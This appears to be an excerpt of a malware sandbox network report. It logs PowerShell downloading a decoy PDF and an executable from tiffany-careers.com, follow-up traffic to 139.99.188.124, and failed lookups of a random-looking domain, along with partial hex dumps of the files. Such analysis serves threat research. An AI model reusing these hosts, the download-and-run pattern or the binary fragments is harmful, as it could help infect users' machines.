                                                                              Dec 18, 2024 21:00:37.265974998 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.267589092 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.267606020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.267642975 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.269113064 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.269129992 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.269184113 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.270826101 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.270843029 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.270909071 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.272552967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.272569895 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.272928953 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.274322987 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.274341106 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.274452925 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.276072979 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.276089907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.276158094 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.277851105 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.277868032 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.277882099 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.277930021 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.279608011 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.279635906 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.279800892 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.281443119 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.281460047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.281553984 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.283184052 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.283200026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.283245087 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.285022020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.285038948 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.285053968 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.285079002 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.285116911 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.286804914 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.286822081 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.286870956 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.288527966 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.288556099 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.290292978 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.290314913 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.290333033 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.290649891 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.292131901 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.292149067 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.292190075 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.293900013 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.293930054 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.293945074 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.293972015 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.295715094 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.295732021 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.295805931 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.297450066 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.297466993 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.297537088 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.299335003 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.299352884 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.299585104 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.301047087 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.301063061 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.301079035 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.301099062 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.301120043 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.302769899 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.302815914 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.302865028 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.304603100 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.304620028 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.304671049 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.306546926 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.306564093 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.306725025 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.308161974 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.308178902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.308259010 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.309978962 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.309997082 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.310013056 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.310070038 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.311678886 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.311734915 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.311953068 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.313508987 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.313544989 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.313611031 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.315329075 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.315346956 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.315448999 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.317285061 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.317302942 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.317317963 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.317353010 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.317353010 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.319032907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.319051027 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.319242001 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.321213961 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.321230888 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.321332932 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.323122978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.323149920 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.323245049 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.324904919 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.324922085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.324973106 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.326549053 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.326576948 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.326591969 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.326647043 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.328217030 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.328233957 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.328749895 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.329756975 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.329773903 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.329833984 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.331424952 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.331443071 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.331588030 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.333103895 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.333121061 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.333134890 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.333152056 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.333245039 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.334866047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.334892988 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.334939003 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.336647034 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.336663961 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.336757898 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.338464975 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.338480949 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.338617086 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.340301037 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.340317965 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.340363979 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.345876932 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.345892906 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.345907927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.345952988 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.346357107 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.346374035 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.348067045 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.348114014 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.348114014 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.348205090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.454400063 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.454456091 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.454766035 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.455602884 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.455621004 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.455888987 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.457194090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.457210064 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.457554102 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.458861113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.458877087 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.459083080 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.460417032 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.460433960 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.460612059 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.462012053 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.462028027 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.462285042 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.463628054 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.463641882 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.463721037 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.465363026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.465389967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.465399027 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.467189074 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.467206001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.468069077 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.468923092 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.468939066 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.468971014 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.568691015 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.882518053 CET4975380192.168.2.4139.99.188.124

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 18, 2024 21:00:11.145558119 CET6014953192.168.2.41.1.1.1
                                                                              Dec 18, 2024 21:00:11.290222883 CET53601491.1.1.1192.168.2.4
                                                                              Dec 18, 2024 21:00:29.188843966 CET5652853192.168.2.41.1.1.1
                                                                              Dec 18, 2024 21:00:40.631582022 CET6423453192.168.2.41.1.1.1
                                                                              Dec 18, 2024 21:00:40.769561052 CET53642341.1.1.1192.168.2.4
                                                                              Dec 18, 2024 21:01:00.406568050 CET5084453192.168.2.41.1.1.1
                                                                              Dec 18, 2024 21:01:00.544830084 CET53508441.1.1.1192.168.2.4
                                                                              Dec 18, 2024 21:01:01.431876898 CET6361053192.168.2.41.1.1.1
                                                                              Dec 18, 2024 21:01:01.571968079 CET53636101.1.1.1192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 18, 2024 21:00:11.145558119 CET192.168.2.41.1.1.10xfe59Standard query (0)tiffany-careers.comA (IP address)IN (0x0001)false
                                                                              Dec 18, 2024 21:00:29.188843966 CET192.168.2.41.1.1.10x3d21Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                              Dec 18, 2024 21:00:40.631582022 CET192.168.2.41.1.1.10x5704Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                              Dec 18, 2024 21:01:00.406568050 CET192.168.2.41.1.1.10x470dStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                              Dec 18, 2024 21:01:01.431876898 CET192.168.2.41.1.1.10xf78Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 18, 2024 21:00:11.290222883 CET1.1.1.1192.168.2.40xfe59No error (0)tiffany-careers.com147.45.49.155A (IP address)IN (0x0001)false
                                                                              Dec 18, 2024 21:00:27.895478964 CET1.1.1.1192.168.2.40xa0d5No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                              Dec 18, 2024 21:00:27.895478964 CET1.1.1.1192.168.2.40xa0d5No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                              Dec 18, 2024 21:00:29.409410000 CET1.1.1.1192.168.2.40x3d21No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 18, 2024 21:00:40.769561052 CET1.1.1.1192.168.2.40x5704Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 18, 2024 21:01:00.544830084 CET1.1.1.1192.168.2.40x470dName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 18, 2024 21:01:01.571968079 CET1.1.1.1192.168.2.40xf78Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • tiffany-careers.com
                                                                              • 139.99.188.124

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449733147.45.49.155801260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 18, 2024 21:00:16.176245928 CET82OUTGET /Marketing.pdf HTTP/1.1
                                                                              Host: tiffany-careers.com
                                                                              Connection: Keep-Alive
                                                                              Dec 18, 2024 21:00:17.544663906 CET1236INHTTP/1.1 200 OK
                                                                              etag: "f92-675e8dca-2534b;;;"
                                                                              last-modified: Sun, 15 Dec 2024 08:05:30 GMT
                                                                              content-type: application/pdf
                                                                              content-length: 3986
                                                                              accept-ranges: bytes
                                                                              date: Wed, 18 Dec 2024 20:00:17 GMT
                                                                              server: LiteSpeed
                                                                              connection: Keep-Alive
                                                                              Data Raw: 25 50 44 46 2d 31 2e 33 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 50 61 72 65 6e 74 20 31 20 30 20 52 0a 2f 52 65 73 6f 75 72 63 65 73 20 32 20 30 20 52 0a 2f 43 6f 6e 74 65 6e 74 73 20 34 20 30 20 52 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 38 37 39 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 54 4d 93 d3 3a 10 bc f3 2b e6 08 55 fb 84 bf 3f f6 c6 2e 50 f5 de 2b aa 28 48 c1 85 8b 62 4f 12 b1 b6 14 24 25 a9 fc 7b 66 a4 38 4e c8 2e 27 c7 8e 46 dd d3 dd 33 19 fc f7 2a 11 65 0d 87 57 0f 0b 78 fb 31 85 b4 10 49 02 8b 15 7c 58 f0 a7 34 69 44 db 42 dd 96 22 ad 61 d1 c3 eb 2f 66 40 30 2b 90 1a de f5 7b b4 5e 39 a5 d7 f0 28 c7 ad 54 6b 0d 9f a4 96 6b b4 a0 34 48 78 34 f4 55 1f df c0 e2 e7 e9 c2 b7 1f 33 48 b3 19 23 11 55 d5 c2 22 e0 e7 a9 48 1b a8 f3 56 24 11 6b b1 c1 bf 83 48 4f 20 5d 04 81 ed 20 8f 8e df ad f2 aa 93 03 58 a6 4a 3c 0c dd e0 10 f9 06 a9 7b 18 b9 98 5e 26 56 c9 35 [TRUNCATED]
                                                                              Data Ascii: %PDF-1.33 0 obj<</Type /Page/Parent 1 0 R/Resources 2 0 R/Contents 4 0 R>>endobj4 0 obj<</Filter /FlateDecode /Length 879>>streamx}TM:+U?.P+(HbO$%{f8N.'F3*eWx1I|X4iDB"a/f@0+{^9(Tkk4Hx4U3H#U"HV$kHO ] XJ<{^&V5|:z:j27 n=QAai<H|#?]HW%Y{kCY)Xg>$vb+co),6E>>Rk~nI]kVGdBvRiOrE*)sylC${v\ ***\#a&pP~QG92WJ#tPf,]n)/a0<$a|&OY-N=R3M&Daj>!ZJGcycx7wdEj|E&XQ,J>)7%Z9uK7\u#FAlC@N^e]dM)8}|cV3.>Vufqrw-,HU]eh 48jc?Ltcfi${I"vRc[\v]^<MKQL+4vI\6 Ht.^n!O\>
                                                                              Dec 18, 2024 21:00:17.555494070 CET1236INData Raw: 1c 6f bd 2f 1b 51 57 27 eb c9 86 2e 0a 7e da 04 92 72 89 34 6d 97 3b 28 36 1b b0 7e 03 cf d2 4e 60 0a 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 35 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 50 61 72 65 6e 74 20 31
                                                                              Data Ascii: o/QW'.~r4m;(6~N`endstreamendobj5 0 obj<</Type /Page/Parent 1 0 R/Resources 2 0 R/Contents 6 0 R>>endobj6 0 obj<</Filter /FlateDecode /Length 872>>streamx}UKo8W{)][/5YK@Rv_3G$6^%$
                                                                              Dec 18, 2024 21:00:17.579575062 CET1236INData Raw: 92 94 5d ff 7d 87 94 17 39 76 0f 06 04 69 66 38 6f a3 13 f8 fe 10 b1 bc 84 fd c3 f3 0a be 7c 4b 20 4e 58 14 c1 aa 83 d7 95 7f 95 c6 2c ae a0 2c 4a 96 25 b0 6a e1 63 c5 e0 d9 70 d5 c2 4f ae f8 06 07 54 ee eb 27 58 bd f9 fa 98 a5 51 0d ab fd a2 31
                                                                              Data Ascii: ]}9vif8o|K NX,,J%jcpOT'XQ1YT!w(Gh0ru`aF&MqS(k4At}z2OJXZ2[hZvY0<cQzdk,0Ilgh?v.jI:
                                                                              Dec 18, 2024 21:00:17.603683949 CET529INData Raw: 46 50 44 46 20 31 2e 37 2e 32 20 68 74 74 70 3a 2f 2f 70 79 66 70 64 66 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 29 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 20 28 44 3a 32 30 32 34 31 31 30 38 31 31 30 32 34 35 29 0a 3e 3e 0a 65 6e 64 6f
                                                                              Data Ascii: FPDF 1.7.2 http://pyfpdf.googlecode.com/)/CreationDate (D:20241108110245)>>endobj12 0 obj<</Type /Catalog/Pages 1 0 R/OpenAction [3 0 R /FitH null]/PageLayout /OneColumn>>endobjxref0 130000000000 65535 f 0000003020 00000 n 0000
                                                                              Dec 18, 2024 21:00:17.804616928 CET58OUTGET /PefjSkkhb.exe HTTP/1.1
                                                                              Host: tiffany-careers.com
                                                                              Dec 18, 2024 21:00:18.288752079 CET266INHTTP/1.1 200 OK
                                                                              etag: "108a00-675eb102-2534d;;;"
                                                                              last-modified: Sun, 15 Dec 2024 10:35:46 GMT
                                                                              content-type: application/x-executable
                                                                              content-length: 1083904
                                                                              accept-ranges: bytes
                                                                              date: Wed, 18 Dec 2024 20:00:17 GMT
                                                                              server: LiteSpeed
                                                                              connection: Keep-Alive
                                                                              Dec 18, 2024 21:00:18.291671991 CET1236INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                                              Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$o1)+PG+PG+PG>PGPGPG*PGy8BPGy8C:PGy8D#PG"(#PG"(*PG"(PG+PFRG9I{PG9D
                                                                              Dec 18, 2024 21:00:18.314171076 CET1236INData Raw: 00 48 8d 0d 74 87 04 00 48 83 c4 28 e9 27 3e 02 00 cc cc cc 48 83 ec 28 e8 8f 0c 02 00 48 8d 0d 60 87 04 00 48 83 c4 28 e9 0b 3e 02 00 cc cc cc 48 83 ec 28 e8 47 0c 02 00 48 8d 0d 50 87 04 00 48 83 c4 28 e9 ef 3d 02 00 cc cc cc 48 83 ec 28 48 8d
                                                                              Data Ascii: HtH('>H(H`H(>H(GHPH(=H(HHAH(=H\$UVWATAUAVAWH`HZ3$l$PM$HHt$XLDDH?HvHGHH0DHvHGHH(HvHOHI
                                                                              Dec 18, 2024 21:00:18.337371111 CET1236INData Raw: 83 fa ff 75 34 80 7b 68 00 0f 85 e7 84 04 00 8b c6 48 8b 5c 24 78 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 33 c0 eb e7 e8 fd d1 0a 00 eb b6 89 83 80 00 00 00 eb c4 89 93 84 00 00 00 eb c4 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70
                                                                              Data Ascii: u4{hH\$xH0A_A^A]A\_^]3HHXHhHpHx ATAVAWH HE3LcJH9HHO(E3H};DvHeIHHtG9Cuw<LLH$HHHH
                                                                              Dec 18, 2024 21:00:18.361507893 CET1236INData Raw: 0d 3f f3 0e 00 48 83 f9 03 76 b8 4c 8b 05 2a f3 0e 00 eb a4 83 c8 ff 89 05 5b f3 0e 00 89 05 51 f3 0e 00 e9 f2 fe ff ff 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 48 8b 9a 10 03 00 00 49 8b e8 48 8b fa 4c 8b f3 48
                                                                              Data Ascii: ?HvL*[QHHXHhHpHx AVH HIHLHtGHtH;ucHsHcHH;jHH H1Ht*H3DBH\$0Hl$8Ht$@H|$HH A^H%AH/Hr@SH HIHHAH
                                                                              Dec 18, 2024 21:00:18.385541916 CET896INData Raw: ff ff 49 8b 0e 48 8d 54 24 40 ff 15 20 3d 0b 00 4c 8d 9c 24 90 00 00 00 49 8b 5b 18 49 8b 73 20 49 8b 7b 28 49 8b e3 41 5e c3 cc cc 48 89 5c 24 10 48 89 4c 24 08 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 30 45 33 ff 48 8b ca 49 8b d8 48 8b fa 45
                                                                              Data Ascii: IHT$@ =L$I[Is I{(IA^H\$HL$UVWATAUAVAWH0E3HIHEgDd$pEwD2D%uHHt03Dd$(!t$ EE3DKE+A;H[EH\$xH0A_A^A]A\_^]HLLcAED$<s DKHIIA;
                                                                              Dec 18, 2024 21:00:18.409648895 CET1236INData Raw: 4c 8b 44 24 40 4c 8b 4c 24 38 44 8a b4 24 a0 00 00 00 e9 45 ff ff ff cc 48 89 5c 24 08 57 48 83 ec 20 80 3d 37 eb 0e 00 00 41 8b f8 48 8b da 74 21 48 8b ca ff 15 7e 2e 0b 00 8d 47 02 c6 05 1c eb 0e 00 00 48 8b cb 83 f8 01 76 4a ff 15 76 2f 0b 00
                                                                              Data Ascii: LD$@LL$8D$EH\$WH =7AHt!H~.GHvJv/HHt-HQ/HH%D.H%H\$0H _<.HHXHhHpHx AVH@EAHA9l$x|$pHiHd$
